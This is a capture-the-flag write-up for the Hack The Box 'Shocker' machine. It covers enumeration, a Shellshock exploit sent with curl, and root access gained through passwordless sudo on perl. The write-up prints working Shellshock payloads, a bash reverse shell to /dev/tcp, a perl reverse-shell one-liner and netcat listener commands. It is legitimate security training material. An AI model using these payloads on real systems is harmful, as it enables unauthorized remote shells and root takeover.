HTB - Shocker

2 minute read

HTB - Shocker

Shocker picture

Completed on: February 7, 2021
Time to Complete: 48 minutes
OS: Linux

Note! Added shocker IP to /etc/hosts as shocker shocker.htb


The shocker Hack The Box machine shows how severe a shellshock vulnerability can be. After enumeration, a bash script hosted within /cgi/ directory can be identified which is vulnerable to shellshock. Using curl I sent payloads to verify vulnerability and granted me user level access. Privilege escalation was done through permissions misconfiguration with perl binary, since user was allowed to run it as root without a password.



Nmap version and port scan with default scripts enabled found only 2 ports open (-sV -sC):

  • 80 (Apache 2.4.18)
  • 2222 (OpenSSH 7.2p2)

Enumerating Apache Server

Routing to http://shocker.htb I encountered a bug, like, an actual picture of a bug:

Shocker root http server picture

Forced Directory

The default page is a static HTML page with a picture. Trying to route to index.html vs index.php we can confirm the site is using html extension. Since we have nothing else to go by, I ran a gobuster to force browse directories:

Note! The image does not show but /cgi-bin/ returned a 404 response.

sudo gobuster dir -x html -u http://shocker.htb/ -w ~/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

Gobuster with general wordlist using html extension picture

I was not able to find anything interesting, but knowing the machine is called “Shocker” I went ahead and ran a dirbuster with CGIs wordlist even though /cgi-bin/ was returning a 404 and discovered a bash file:

sudo gobuster dir -u http://shocker.htb/ -w ~/SecLists/Discovery/Web-Content/CGIs.txt

Gobuster with cgi-bin wordlist picture

Routing to the site (http://shocker.htb/cgi-bin/ it asks for to download, using curl I was able to see the script’s content, it was running a uptime script and outputting the content when reached:

Picture of curl to the user shell file

Initial Foothold

With the found shell script, I ran a POC Shellshock payload using curl that should list the home directory (ls):

curl -A "() { :;};echo;/bin/ls -la /home" http://shocker.htb/cgi-bin/

Picture of curl to the user shell file outputting ls

The POC confirmed that shellshock is possible against this script. I then utilize this vulnerability to create a reverse shell with /bin/bash:

# Don’t forget to open a netcat listener using: sudo nc -nlvp 7000
curl -A "() { :;};echo;/bin/bash -i > /dev/tcp/ 0<&1 2>&1" http://shocker.htb/cgi-bin/

Picture of curl to the user shell creating a reverse shell

This granted me a user shell as shelly. Now lets move into enumerate state again to privilege escalate.

Privilege Escalation

I used sudo -l to list shelly’s sudo privileges, we see she is able to run perl as root without a password:

Picture of sudo -l command through shelly user

Perfect! Using this I created a privilege reverse shell using perl to get root:

# Don’t forget to open a netcat listener using: sudo nc -nlvp 7001
sudo /usr/bin/perl -e 'use Socket;$i="";$p=7001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Picture of perl to privilege escalate

That’s it! Although this box was easier, it goes to show how severe ShellShock vulnerability was during 2014-2018.

According to Security Intelligence’s August 2020 article it’s still relevant in 2020 considering there is numerous vulnerable servers. The article points to Politico’s January 2020 news article which reported that Georgia election systems was still vulnerable to ShellShock.